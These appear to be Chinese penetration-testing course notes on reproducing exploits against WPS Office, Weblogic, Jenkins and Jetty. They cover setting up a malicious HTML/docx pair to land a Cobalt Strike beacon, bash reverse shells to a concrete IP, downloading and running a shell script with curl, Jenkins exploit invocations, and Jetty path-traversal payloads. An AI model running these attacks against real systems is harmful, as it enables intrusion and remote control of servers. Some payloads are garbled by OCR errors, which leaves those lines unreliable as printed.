080-服务攻防-工具箱&WPS复现&其他项目等

应用WPS-HW2023-RCE执行&复现&上线CS

金山WPS RCE

wps影响范围为:WPS Office 2023 个人版< 11.1.0.15120

WPS Office 2019 企业版< 11.8.2.12085

POC
在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)
127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn
漏洞触发需让域名规则满足

clientweb.docer,wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系

代码块在底下。(需要原pdf加wechat)

1、简单复现网上 POC分析1.html poc.docx

image-20250709144119769

使用python环境启动

1
python --m http.server 80

image-20250709143917649

image-20250709144313780 image-20250709144619547

image-20250709144644427

image-20250709144751508

2、修改配合联动上线CS

-修改 html 中的 shellcode(C#)
-修改 docx 中的指向连接 URL
-修改 hosts 绑定执行域名规则漏洞触发需让域名规则满足 clientweb.docer.wps.cn.{xxxxx}wps.cn

image-20250709144926667

image-20250709145001019

image-20250709145212264

image-20250709145414536

image-20250709145636599

image-20250709150249810

image-20250709150331558

中间件-Weblogic-CVE&反序列化&RCE

weblogic是Oracle 公司推出的 J2EE 应用服务器

探针默认端口:7001CVE-2023-21839(JNDI)
CVE-2020-2551(JRMP)
CVE-2020-2551
CVE-2020-2555
CVE-2020-2883
CVE-2020-14882未授权访问
CVE-2018-2894
CVE-2018-2628(JRMP)
CVE-2018-2893(JRMP)
CVE-2018-3245(JRMP)
CVE 20183252(JRMP)
CVE 2018 3191
CVE-2016-3510
CVE-2016-0638
CVE-2017-10271

CVE-2017-3248(JRMP)
CVE-2015-4852
https://github.com/KimJun1010/WeblogicTool

image-20250709151858916

image-20250709151951217

中间件-Jenkins-CVE&RCE 执行

Jenkins 是一个开源软件项目,是基于 Java 开发的一种持续集成工具,用于监控持续重复的工作。探针默认端口:8080

1、cve-2017-1000353 JDK-1.8.0 291 其他版本失效

1
bash -i >& /dev/tcp/IP地址/端口  0>&1

image-20250709153819099

使用工具进行利用

项目地址:http://github.com/vulhub/CVE-2017-1000353

1
2
java -jar CVE-2017-1000353-1.1-SNAPSH0T-all.jar jenkins poc.ser
"bash -c

image-20250709153634859

1
python exploit.py IP地址:端口 jenkins poc.ser

image-20250709154015830

image-20250709154047255

2、CVE-2018-1000861

项目地址:https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

python3 -m http.server 8888

python2 exp.py http://123.58.236.76:52281/"curl -o /tmp/1.shhttp://47.94.236.117:8888/shell.txt

python2 exp.py http://123.58.236.76:52281/ “bash /tmp/1.sh”

image-20250709154704091

image-20250709154729538

image-20250709154933659

image-20250709155227164

image-20250709155256420

中间件-Jetty-CVE&信息泄漏

Jetty是一个开源的 servlet 容器,它为基于 Ja亚a 的 Web 容器提供运行环境。
/号2e/WEB-INF/web.xml
/.号00/WEB-INF/web.xml
/号u002e/WEB-INF/web.xm1
/static?/WEB-INF/web.xm1
/a/b/..号00/WEB-INF/web.

黑盒:直接访问路径地址即可

image-20250709155827301 image-20250709155932300

中间件直接使用工具梭哈